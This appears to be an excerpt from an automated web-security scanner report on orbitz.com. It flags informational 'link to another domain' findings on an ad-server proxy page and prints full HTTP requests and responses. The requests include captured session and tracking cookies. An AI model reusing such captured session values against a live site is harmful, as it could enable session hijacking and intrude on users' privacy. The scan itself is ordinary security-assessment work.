popUpGen('http://www.truste.org/ivalidate.php?url=www.orbitz.com&sealid=101&popupsDisabled=true');" > <img src="/site/img/logos/truste.gif" width="128" height="35" border="0" alt="TRUSTe" />
...[SNIP]...
<div class="ad" id="ad1x1">
<iframe allowtransparency="true" height="1" width="1" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://www.revresda.com/html.ng/channel=air&Section=results&adsize=1x1&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=1&width=1&pos=top&"><script language="JavaScript1.1" src="http://www.revresda.com/js.ng/Params.richmedia=yes&channel=air&Section=results&adsize=1x1&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=1&width=1&pos=top&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=results&adsize=1x1&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=1&width=1&pos=top&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=results&adsize=1x1&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=1&width=1&pos=top&" height="1" width="1" border="0"></a>
...[SNIP]...
<div class="ad" id="ad1x1">
<iframe allowtransparency="true" height="1" width="1" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://www.revresda.com/html.ng/channel=air&Section=results&adsize=1x1&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=1&width=1&adType=iframe&pos=middle&"><script language="JavaScript1.1" src="http://www.revresda.com/js.ng/Params.richmedia=yes&channel=air&Section=results&adsize=1x1&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=1&width=1&adType=iframe&pos=middle&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=results&adsize=1x1&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=1&width=1&adType=iframe&pos=middle&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=results&adsize=1x1&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=1&width=1&adType=iframe&pos=middle&" height="1" width="1" border="0"></a>
...[SNIP]...
19.225. http://www.orbitz.com/shared/adserverProxy.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shared/adserverProxy.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /shared/adserverProxy.jsp?tab=2 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598401966:ss=1317596806325; mbox=session#1317600406536-142286#1317603863|PC#1317600406536-142286.19#1320194003|check#true#1317602063; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; adRotator=true

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Cteonnt-Length: 877
Date: Mon, 03 Oct 2011 00:33:55 GMT
Cache-Control: private
Content-Length: 877

<a target="_top" href="http://www.revresda.com/event.ng/Type=click&FlightID=81438&AdID=270694&TargetID=37184&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,8303,8773,11672,12591,14862,22067,24028,27371,30359,34504,34960,38844,39489,39804,42624,45767,47055,47463,48051,49979,50264,50404,59626,60715,61817,62466,62910,63592,64040&Targets=37627,37184,41261&Values=34,46,63,80,92,101,194,216,264,32876,33112,33119,33156,33234,34137,34581,34635,35048,35586,35793,36105,36112,36138,66788,66797,67440,68027,68271,68362,68366,68375,96177,103024,103078,103453&RawValues=&WebLogicSession=&Params.User.UserID=$User.UserID$&Redirect=http%3A%2F%2Fwww.orbitz.com%2FApp%2FPerformMDLPDealsContent%3Fdeal_id%3Dvegasvacation%26cnt%3DPKH%26type%3Dcs_qs"><img src="http://www.orbitz.com/Marketing/Images/ORB_cs_LasVegas-LastMinute_519x225.jpg" border=0 height=225 width=519 alt="Click Here">
...[SNIP]...
19.226. http://www.orbitz.com/shared/adserverProxy.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shared/adserverProxy.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /shared/adserverProxy.jsp?tab=3 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OSC=71A4AF1632EAB3B1F4E0C49149EEC65B; anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317596806325:ss=1317596806325; mbox=check#true#1317600467|session#1317600406536-142286#1317602267; adRotator=true; logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Cteonnt-Length: 905
Date: Mon, 03 Oct 2011 00:07:28 GMT
Cache-Control: private
Content-Length: 905

<a target="_top" href="http://www.revresda.com/event.ng/Type=click&FlightID=115231&AdID=275752&TargetID=37183&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,8303,8773,11672,12591,14863,22067,24028,27371,30359,34504,34960,38844,39489,39804,42624,45767,47055,47463,48051,49979,50264,50391,50404,59626,60715,61817,62466,62910,63592,64040&Targets=37627,37183,41261&Values=34,46,63,80,92,101,194,216,264,32876,33112,33119,33156,33234,34137,34581,34635,35048,35586,35793,36105,36112,36138,66789,66797,67440,68027,68271,68362,68366,68375,96177,103024,103054,103078,103453&RawValues=&WebLogicSession=&Params.User.UserID=$User.UserID$&Redirect=http%3A%2F%2Fwww.orbitz.com%2FApp%2FPerformMDLPDealsContent%3Fdeal_id%3Deco-vacations%26cnt%3DPRO%26type%3Dcs_qs"><img src="http://www.orbitz.com/Marketing/Images/US/MERCH/cs/1024/orb/dph/ORB_cs_Eco35-PR_519x225.jpg" border=0 height=225 width=519 alt="Click Here">
...[SNIP]...
19.227. http://www.orbitz.com/shared/adserverProxy.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shared/adserverProxy.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /shared/adserverProxy.jsp?tab=3 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598401966:ss=1317596806325; mbox=session#1317600406536-142286#1317603863|PC#1317600406536-142286.19#1320194003|check#true#1317602063; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; adRotator=true

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Cteonnt-Length: 892
Date: Mon, 03 Oct 2011 00:34:00 GMT
Cache-Control: private
Content-Length: 892

<a target="_top" href="http://www.revresda.com/event.ng/Type=click&FlightID=115231&AdID=275752&TargetID=37183&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,8303,8773,11672,12591,14863,22067,24028,27371,30359,34504,34960,38844,39489,39804,42624,45767,47055,47463,48051,49979,50264,50404,59626,60715,61817,62466,62910,63592,64040&Targets=37627,37183,41261&Values=34,46,63,80,92,101,194,216,264,32876,33112,33119,33156,33234,34137,34581,34635,35048,35586,35793,36105,36112,36138,66789,66797,67440,68027,68271,68362,68366,68375,96177,103024,103078,103453&RawValues=&WebLogicSession=&Params.User.UserID=$User.UserID$&Redirect=http%3A%2F%2Fwww.orbitz.com%2FApp%2FPerformMDLPDealsContent%3Fdeal_id%3Deco-vacations%26cnt%3DPRO%26type%3Dcs_qs"><img src="http://www.orbitz.com/Marketing/Images/US/MERCH/cs/1024/orb/dph/ORB_cs_Eco35-PR_519x225.jpg" border=0 height=225 width=519 alt="Click Here">
...[SNIP]...
19.228. http://www.orbitz.com/shared/adserverProxy.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shared/adserverProxy.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /shared/adserverProxy.jsp?tab=1 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598401966:ss=1317596806325; mbox=session#1317600406536-142286#1317603863|PC#1317600406536-142286.19#1320194003|check#true#1317602063; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; adRotator=true

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Cteonnt-Length: 896
Date: Mon, 03 Oct 2011 00:33:55 GMT
Cache-Control: private
Content-Length: 896

<a target="_top" href="http://www.revresda.com/event.ng/Type=click&FlightID=84082&AdID=273149&TargetID=37186&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,8303,8773,11672,12591,14861,22067,24028,27371,30359,34504,34960,38844,39489,39804,42624,45767,47055,47463,48051,49979,50264,50404,59626,60715,61817,62466,62910,63592,64040&Targets=37627,37186,41261&Values=34,46,63,80,92,101,194,216,264,32876,33112,33119,33156,33234,34137,34581,34635,35048,35586,35793,36105,36112,36138,66787,66797,67440,68027,68271,68362,68366,68375,96177,103024,103078,103453&RawValues=&WebLogicSession=&Params.User.UserID=$User.UserID$&Redirect=http%3A%2F%2Fwww.orbitz.com%2FApp%2FPerformMDLPDealsContent%3Fdeal_id%3Dpromotions%26cnt%3DPRO%26type%3Dcs_qs"><img src="http://www.orbitz.com/Marketing/Images/US/MERCH/cs/1024/orb/dph/ORB_cs_FallHotelSale-40_519x225.jpg" border=0 height=225 width=519 alt="Click Here">
...[SNIP]...
19.229. http://www.orbitz.com/shared/adserverProxy.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shared/adserverProxy.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /shared/adserverProxy.jsp?tab=1 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Referer: http://www.orbitz.com/App/SubmitQuickSearch?z=dc61&r=39i
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; adRotator=true; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; PackagingContext=APH; DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA||||||||MIA|BOS|||||||||||||||||||||||||||||||||||||||||||||advanced|; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598509204:ss=1317596806325; mbox=session#1317600406536-142286#1317603970|PC#1317600406536-142286.19#1320194110|check#true#1317602170; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Cteonnt-Length: 1009
Date: Mon, 03 Oct 2011 00:35:50 GMT
Cache-Control: private
Content-Length: 1009

<a target="_top" href="http://www.revresda.com/event.ng/Type=click&FlightID=84082&AdID=273149&TargetID=37186&ASeg=&AMod=&Segments=65,1720,3724,4979,5788,7409,8303,8773,11672,12591,14861,22067,23218,24028,24031,24032,27371,30359,34504,34960,38844,39489,39804,42624,42960,45767,47055,47463,48051,49979,50264,50404,53234,54582,55025,55153,55715,56024,57889,59626,60715,61059,61063,61817,62466,62885,62910,62961,63592,64039&Targets=37627,37186,41261&Values=34,46,63,80,92,101,194,216,264,22584,27203,32259,32876,33112,33119,33156,33234,34137,34581,34635,35048,35586,35793,36105,36112,36138,66787,66797,67440,68027,68271,68362,68366,68375,96177,103024,103078,103453&RawValues=&WebLogicSession=&Params.User.UserID=$User.UserID$&Redirect=http%3A%2F%2Fwww.orbitz.com%2FApp%2FPerformMDLPDealsContent%3Fdeal_id%3Dpromotions%26cnt%3DPRO%26type%3Dcs_qs"><img src="http://www.orbitz.com/Marketing/Images/US/MERCH/cs/1024/orb/dph/ORB_cs_FallHotelSale-40_519x225.jpg" border=0 height=225 width=519 alt="Click Here">
...[SNIP]...
19.230. http://www.orbitz.com/shared/adserverProxy.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shared/adserverProxy.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /shared/adserverProxy.jsp?tab=1 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OSC=71A4AF1632EAB3B1F4E0C49149EEC65B; anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317596806325:ss=1317596806325; mbox=check#true#1317600467|session#1317600406536-142286#1317602267; adRotator=true; logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Cteonnt-Length: 909
Date: Mon, 03 Oct 2011 00:07:40 GMT
Cache-Control: private
Content-Length: 909

<a target="_top" href="http://www.revresda.com/event.ng/Type=click&FlightID=84082&AdID=273149&TargetID=37186&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,8303,8773,11672,12591,14861,22067,24028,27371,30359,34504,34960,38844,39489,39804,42624,45767,47055,47463,48051,49979,50264,50391,50404,59626,60715,61817,62466,62910,63592,64040&Targets=37627,37186,41261&Values=34,46,63,80,92,101,194,216,264,32876,33112,33119,33156,33234,34137,34581,34635,35048,35586,35793,36105,36112,36138,66787,66797,67440,68027,68271,68362,68366,68375,96177,103024,103054,103078,103453&RawValues=&WebLogicSession=&Params.User.UserID=$User.UserID$&Redirect=http%3A%2F%2Fwww.orbitz.com%2FApp%2FPerformMDLPDealsContent%3Fdeal_id%3Dpromotions%26cnt%3DPRO%26type%3Dcs_qs"><img src="http://www.orbitz.com/Marketing/Images/US/MERCH/cs/1024/orb/dph/ORB_cs_FallHotelSale-40_519x225.jpg" border=0 height=225 width=519 alt="Click Here">
...[SNIP]...
19.231. http://www.orbitz.com/shared/adserverProxy.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shared/adserverProxy.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /shared/adserverProxy.jsp?tab=1 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OSC=71A4AF1632EAB3B1F4E0C49149EEC65B; anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317596806325:ss=1317596806325; mbox=check#true#1317600467|session#1317600406536-142286#1317602267; adRotator=true; logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Cteonnt-Length: 909
Date: Mon, 03 Oct 2011 00:07:23 GMT
Cache-Control: private
Content-Length: 909

<a target="_top" href="http://www.revresda.com/event.ng/Type=click&FlightID=84082&AdID=273149&TargetID=37186&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,8303,8773,11672,12591,14861,22067,24028,27371,30359,34504,34960,38844,39489,39804,42624,45767,47055,47463,48051,49979,50264,50391,50404,59626,60715,61817,62466,62910,63592,64040&Targets=37627,37186,41261&Values=34,46,63,80,92,101,194,216,264,32876,33112,33119,33156,33234,34137,34581,34635,35048,35586,35793,36105,36112,36138,66787,66797,67440,68027,68271,68362,68366,68375,96177,103024,103053,103078,103453&RawValues=&WebLogicSession=&Params.User.UserID=$User.UserID$&Redirect=http%3A%2F%2Fwww.orbitz.com%2FApp%2FPerformMDLPDealsContent%3Fdeal_id%3Dpromotions%26cnt%3DPRO%26type%3Dcs_qs"><img src="http://www.orbitz.com/Marketing/Images/US/MERCH/cs/1024/orb/dph/ORB_cs_FallHotelSale-40_519x225.jpg" border=0 height=225 width=519 alt="Click Here">
...[SNIP]...
19.232. http://www.orbitz.com/shared/adserverProxy.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shared/adserverProxy.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /shared/adserverProxy.jsp?tab=4 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OSC=71A4AF1632EAB3B1F4E0C49149EEC65B; anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317596806325:ss=1317596806325; mbox=check#true#1317600467|session#1317600406536-142286#1317602267; adRotator=true; logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Cteonnt-Length: 862
Date: Mon, 03 Oct 2011 00:07:32 GMT
Cache-Control: private
Content-Length: 862

<a target="_top" href="http://www.revresda.com/event.ng/Type=click&FlightID=81441&AdID=274358&TargetID=37187&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,8303,8773,11672,12591,14864,22067,24028,27371,30359,34504,34960,38844,39489,39804,42624,45767,47055,47463,48051,49979,50264,50391,50404,59626,60715,61817,62466,62910,63592,64040&Targets=37627,37187,41261&Values=34,46,63,80,92,101,194,216,264,32876,33112,33119,33156,33234,34137,34581,34635,35048,35586,35793,36105,36112,36138,66790,66797,67440,68027,68271,68362,68366,68375,96177,103024,103054,103078,103453&RawValues=&WebLogicSession=&Params.User.UserID=$User.UserID$&Redirect=http%3A%2F%2Fcruises.orbitz.com%2Fpromotion%2Fcruise-event.do"><img src="http://www.revresda.com/Marketing/Images/US/MERCH/cs/1024/orb/crs/ORB_FallSale_0908-0930_519x225.jpg" border=0 height=225 width=519 alt="Click Here"></a>
...[SNIP]...
19.233. http://www.orbitz.com/shared/adserverProxy.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shared/adserverProxy.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /shared/adserverProxy.jsp?tab=5 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
